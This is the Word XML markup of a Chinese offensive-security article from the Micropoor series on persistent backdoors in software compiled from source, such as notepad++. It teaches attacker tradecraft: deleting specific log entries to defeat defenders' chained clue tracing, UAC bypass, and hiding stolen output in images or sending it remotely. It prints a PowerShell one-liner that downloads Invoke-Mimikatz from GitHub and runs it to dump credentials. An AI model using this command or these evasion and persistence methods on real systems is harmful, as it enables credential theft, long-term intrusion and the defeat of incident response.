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483.0pt;margin-top:728.400pt;width:6.0pt;height:6.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7" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>专注AP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>T攻击与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="68" w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micropoor.blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>spot.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="357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080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>前者的话：</w:t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从第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>三季开始引入段子，让本枯燥的学术文章，也变得生动有趣。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第二季的Demo遵循人性五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>条来设计，回忆这其中五条：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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1：攻</w:t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击方与防御方的本质是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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405" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>增加对方的时间成本，人力成本，资源成本（不限制于服务器资源），金钱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>成本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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2：安全公司的</w:t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本质是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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405" w:right="0" w:firstLine="0"/>
      </w:pP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盈利，最小投入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，最大产出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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3：安全</w:t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公司产品的本质是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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405" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>能适应大部分客户，适应市场化，并且适应大部分机器。（包括不限制于资源紧张，宽带不足等问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>题的客户）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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4：安全人员的</w:t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本质是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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405" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>赚钱，养家。买房，还房贷。导致，快速解决客户问题（无论暂时还是永久性解决），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以免投诉。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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5：对接客户的</w:t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本质是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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405" w:right="0" w:firstLine="0"/>
      </w:pP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对接客户也是某公司内安全工作的一员，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>与概念4相同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6:线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>索排查与反线索排查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="334" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1107" w:firstLine="0"/>
      </w:pP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那么这个demo离可高级可持续性渗透后门还有一段距离，这里引入第六条“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线索排查</w:t>
      </w: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”与“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>反线索排查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”，在</w:t>
      </w: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第二季的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>demo中，它生成了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>名为micropoor.txt的文件，如果经验丰富的安全人员可根据时间差来排查日记，demo的工作流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程大致是这样的，打开notepad++，生成micropoor.txt，写入内容，关闭文件流。根据线索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>排查，定位到notepad++，</w:t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导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>致权限失控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1405" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在线索排查概念中，这里要引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“ABC”类线索关联排查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，当防御者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在得到线索A，顺藤到B，最后排查到目标文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C，根据五条中的第一条，demo要考虑如何删除指定日志内容，以及其他操作。来阻止ABC类线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>索关联排查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1405" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不要思维固死在这是一个nontepad++后门的文章，它是一个面向类后门，面向的是可掌握源码编译的类后门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。同样</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="910" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不要把思维固定死在demo中的例子，针对不同版本的NT系统，完全引用“powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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(New-Object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System.Net.WebClient).DownloadString('https://raw.githubusercont</w:t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ent.com/clymb3r/PowerShell/master/Invoke-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Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而关于bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UAC，已经有成熟的源码。或发送至远程或是写在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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本地的图片里，不要让知识，限制了后门的想象。这也正是第一季</w:t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所说的：一个优秀的Microdoor是量身目标制定且一般</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不具备通用性的。是的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>般不具备通用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="336" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1125" w:firstLine="325"/>
      </w:pP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观看目前文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>章的一共有2类人，一类攻击方，一类防守方。假设一个场景，现在摆在你面前有一台笔记本，并且这台笔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>记本有明确的后门，你的任务，排查后门。我想所有人都会排查注册表，服务，端口，进程等。因为这些具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>备通用性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>同样具备</w:t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通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用性排查手段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7" w:after="0" w:line="341" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="1155" w:firstLine="325"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>临近文章结尾，第三次引用：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在后门的进化对抗中，rootkit也发生了变化，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>最大的改变是它的系统层次结构发生了变</w:t>
      </w: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化。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如果彻底理解了这段话。那</w:t>
      </w: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么就要引用王健X爸爸的一句话：先定个小目标，控它个1825天。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="78" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="88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080" w:right="0" w:firstLine="0"/>
      </w:pP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奈何厂商不重视后渗透攻击与持久性攻击，文章的结尾引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>马X爸爸的一句话：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="68" w:after="0" w:line="251" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:firstLine="0"/>
      </w:pP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厂商不改变，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>们就改变厂商。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8" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="10031" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Micropo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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